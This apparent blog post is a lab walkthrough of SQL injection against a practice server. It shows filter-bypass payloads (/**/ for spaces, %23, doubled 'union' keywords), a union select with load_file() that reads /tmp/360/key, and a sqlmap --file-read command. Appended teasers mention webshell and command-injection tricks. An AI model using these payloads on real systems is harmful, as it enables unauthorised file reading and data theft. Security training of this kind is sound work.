php命令注入绕过姿势,sql注入读取文件之各种绕过姿势

最新推荐文章于 2023-07-18 14:32:22 发布
最新推荐文章于 2023-07-18 14:32:22 发布
阅读量373 收藏 1
点赞数
文章标签: php命令注入绕过姿势

目录

回显判断注入点

确定过滤类型

各种绕过姿势注入

0x00环境介绍

目标地址: http://172.16.12.100:81

注入要求:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。

e59699935abbe61c57eb92684a9f0dac.png

0x01渗透思路

进入答题后,显示为使用select * from article where id= ('1')提交表单后得到的信息,已经知道id输入的参数值为字符,不需要进行判断;已经少了判断字符型,数字型和闭合方式的步骤。

deec7523f6441eeb336ff7ee6ad067bc.png

1.回显判断注入点

基本思路:因为sql语句中闭合的方式是’),那直接使用’)闭合查看是否会回显错误;

18bb4d038139dd10da2c7030850e8a1e.png

2.判断sql语句中被过滤类型

sql语句:http://172.16.12.100:81/vulnerabilities/fu1.php?id=1’) order by 5#回显正常,一直尝试增加判断的列数还是一样,未出现报错情况;也就是说明该条sql语句未被执行,猜测应该是过滤了空格、#、order等;

尝试使用注释/**/代替空格,使用%23代替#,再次输入sql语句,查看回显情况;这一步可以多尝试,组合测试,最终得到过滤类型。

‘)/**/order/**/by/**/5%23回显错误

‘)/**/order/**/by/**/4%23回显正常,空格不适用注释/**/代替回显错误,基本说明浏览器无法识别#,且把空格过滤。

dbf80e87247beb5139de52de9c68ba0e.png

过滤类型:目前知道注释#不可用,空格被过滤;

保证sql语句的完整性基本操作:前边闭合’),后边注释。

3.判断列数

a.直接查询看回显

')/**/uniunionon/**/select/**/1,2,3%23 错误

')/**/uniunionon/**/select/**/1,2,3,4%23正确,那么列数就是4

回显错误:

ce6cf62b8abdad32556ae110eef6257c.png

回显正确:

8cd449c27985d577822179a3686d0ab3.png

b.使用order by n判断列数

order by n:小于等n正常,大于n错误,列数就是n

')/**/order/**/by/**/5%23错误

')/**/order/**/by/**/4%23正确,列数为4

4.判断回显位

前表出错方法有两种:

1)and 1=2

2)id=1改为id=-1 参数值前加负号

payload:id=-1')/**/uniunionon/**/select/**/1,2,3,4%23

根据回显内容,明显2,3,4都可以回显内容;

1d6f9e2cd76d96a28a8fc716cfb50eb3.png

5.读取key

读取key的sql语句:load_file('/tmp/360/key')

payload:id=-1')/**/uniunionon/**/select/**/1,load_file('/tmp/360/key'),3,4%23

b92f2a29fe3a0175293794d95649211d.png

0x02总结

1)除了可以直接读文件,也可以查一些数据库,用户信息等:

user()当前用户

database()当前库名

version()版本

2)使用sqlmap也可以完成本次注入;

使用sqlmap下的/tamper:近60个脚本

显示详细payload: -v 3

基于真假判断:--level 3

sqlmap注入payload:sqlmap.py -u "http://ip:81/vulnerabilities/fu1.php?id=1" --file-read=/tmp/360/key --tamper "space2hash.py"

3)绕过方法可以看另一篇sql注入常见绕过姿势。

crazed1987
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
命令注入以及常见绕过方式
Manuffer的博客
10-11 3695
命令注入及常见绕过方式
【WEB】命令注入(基础知识讲解及绕过姿势)(更新中)
weixin_45844670的博客
08-24 1137
通过web程序,在服务器上拼接系统命令。基础知识命令注入的条件:PHP执行系统命令的函数:&,&&,|,|| 的区别:漏洞利用服务器进行参数过滤空格代替截断符号利用base编码绕过过滤了敏感命令对比和文件上传漏洞对比和远程代码执行对比工具的使用防护白名单保护黑名单保护 基础知识 正常情况下,是ping一个IP地址。确定调用系统命令 确定可控字段 确定命令语句,&&可以连接两条Windows命令 命令注入的条件: web应用程序调用可执行系统命令的函数 执行系统命令
XCTF-攻防世界CTF平台-Web类——18、favorite_number(命令注入)(php5.5.9整数溢出、preg_match正则表达式绕过
Onlyone_1314的博客
01-15 3599
目录标题方法1:ls -i方法2:定义变量输出方法3:写到文件输出方法4:``和$()命令替换 打开题目地址: 提示了源代码,以及php版本是5.5.9 <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^
php 过滤绕过注入,PHPB2B注入#1(绕过过滤)
weixin_34556808的博客
03-29 148
### 简要描述:PHPB2B某处注入#1。绕过过滤。官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip漏洞文件。virtual-office/company.php### 详细说明:POST /phpb2b/virtual-office/company.phpContent-Disposition: form-data; nam...
sql绕过php,SQL注入绕过技巧
weixin_39758618的博客
04-02 1804
1、 大小写混合2、替换关键字3、使用编码4、使用注释5、等价函数与命令6、使用特殊符号7、HTTP参数控制8、缓冲区溢出9、整合绕过a) 大小写绕过大小写绕过用于只针对小写或大写的关键字匹配技术正则表达式/express/i 匹配时大小写不敏感便无法绕过,这是最简单的绕过技术z.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4b)替换关键字这种情况下大...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
SQL注入绕过技巧有很多,下面这篇文章主要给大家介绍了关于SQL注入技巧之显注与盲注中过滤逗号绕过的相关资料,文中通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习吧
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
SQL注入绕过的技巧总结
09-09
本文主要探讨了三种SQL注入绕过技术:引号绕过、逗号绕过以及比较符(<, >)绕过,这些都是在SQL防注入措施下仍能实施攻击的有效手段。 首先,**引号绕过** 是针对那些过滤了单引号(')或双引号(")的系统。...
SQL注入绕过实战案例
最新发布
08-31
本文将深入探讨SQL注入的概念、工作原理,并通过"SQL注入实战案例"来阐述如何进行有效防御和绕过。我们将基于sqli-labs-master靶场进行学习,这是一个专门用于SQL注入攻防演练的平台。 SQL注入(SQL Injection)是...
php5.5过狗
KHOST的博客
01-31 371
新年到了,送给大家一个PHP免杀的webshell吧。(仅限PHP5.5以下版本) 测试环境 PHPstudy8.0.9.2,其中PHP版本为5.2 网站安全狗V4.0正式版 原理 preg_replace函数中使用/e修饰符,造成命令执行。 在PHP5.5以后,/e修饰符被弃用,这种方法就不行了。 <?php$a=$_GET['nb'];preg_rep...
php 代码去注释,php如何去除注释
weixin_42297605的博客
03-09 513
php去除注释的方法:首先打开PHP测试代码文件;然后定义一个“removeComment”方法;接着通过“preg_replace”方法去除注释的内容;最后运行PHP文件即可。推荐:《PHP教程》php去除注释测试代码文件:a.php...
命令执行漏洞(注释绕过)-学习笔记
小龙在线
08-21 605
Linux常用命令 ls -lsa cat rm -f 特殊字符转义:$ @ # ! ^&* windows常用命令 dir # 查看当前目录 type # 查看内容 del # 删除 举例 <?php if(isset($_GET['calc'])) { $calc = $_GET['calc']; system("echo $calc | bc"); } else { highlight_file(__FILE__); } 1+1 | ls # 2&a
PHP花式绕过大全
热门推荐
fly夏天的博客
10-18 1万+
做了这么长的时间的ctf,现在总结一下自己做过的题,记录一下各种可能会存在绕过php函数,持续跟新。 各位大佬可以一起交流♂交流。 1.preg_replace ($pattern , $replacement , $subject ) 其中 $pattern为正则表达式 $replacement为替换字符串 $subject 为要搜索...
PHP特性之CTF中常见的PHP绕过
Welcome To Myon'Blog !
07-18 6081
一、关于md5()和sha1()的常见绕过 1、使用数组绕过 2、 使用特殊字符串绕过 二、strcmp绕过 三、switch绕过 四、intval绕过
PHP+Mysql注入防护与绕过
hl1293348082的专栏
04-04 349
今天给大家分享一个关于php常见的注入防护以及如何bypass的文章,文章内容来源国外某大佬总结,我做了一下整理,文章来源地址不详,下面正文开始。以下的方式也仅仅是针对黑名单的过滤有一定的效果,为了安全最好还是以白名单的方式对参数进行检测。 黑名单关键字过滤绕过 过滤关键字and、or PHP匹配函数代码如下: preg_match('/(and|or)/i', $id) 如何Bypass,过滤注入测试语句: 1 or 1 = 1 1 and 1 = 1 ...
SQL靶场练习之二(空格绕过、报错注入
Lorezon的博客
01-16 726
空格绕过 初始页面是这样的: 0x00判断是否存在注入 在name后面加个单引号,发现页面返回异常: 判断存在注入。 0x02常规拼接 name’ and 1=1 返回异常,显示ERROR NO SPACE,错误无空格。想办法把空格取代掉,使用/**/拼接语句name’/**/and/**/1=1%23 页面返回正常,说明绕过成功。 0x03判断字段 name’/**/order/**/by/*...
SQL注入绕过
嚴 帅的博客
04-30 946
由于Web注入危害比较大,各种防御技术也会应用而生;程序员在写代码的时候会有意识地进行防御设置或者安全测试来封堵Web注入,但是想要绝对的安全,是比较难实现的。针对黑名单过滤技术,绕过的基本思路就是找到一种可替换的符号或者可替换的逻辑语句(来实现SQL注入);对于白名单技术,虽然实现了安全性,但是可能会阻挡一些客户端的合法流量,白名单技术一般用在一些形式固定场景。大多数Web网站还是会使用黑名单技...
xss绕过方法(前端绕过,拼凑绕过,注释干扰绕过,编码绕过
qq_43814486的博客
05-05 8275
绕过思路 前端绕过:前端有很多种方法绕过,比如抓包重放或者修改前端代码。 大小写绕过:一般后台对输入写进行过滤使用两种方法:1,使用正则匹配,2,用查找的函数查找。这两种方法可以用大小写混合的方式进行绕过,而后端是不管大小写的,可以正常执行我们的语句。 拼凑:后端会对我们输入的标签进行替换,但只替换一次,所以可以这样: <scri<script>pt>alert("hell...
深入探究SQL注入:类型、防护与绕过策略
通过实例分析,学员可以掌握如何构造SQL注入语句并利用它来绕过服务器和应用程序的安全防护,例如Web应用防火墙(WAF)。 课程内容详细介绍了SQL注入的定义,它是如何通过恶意构造SQL代码来操纵应用程序的输入参数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值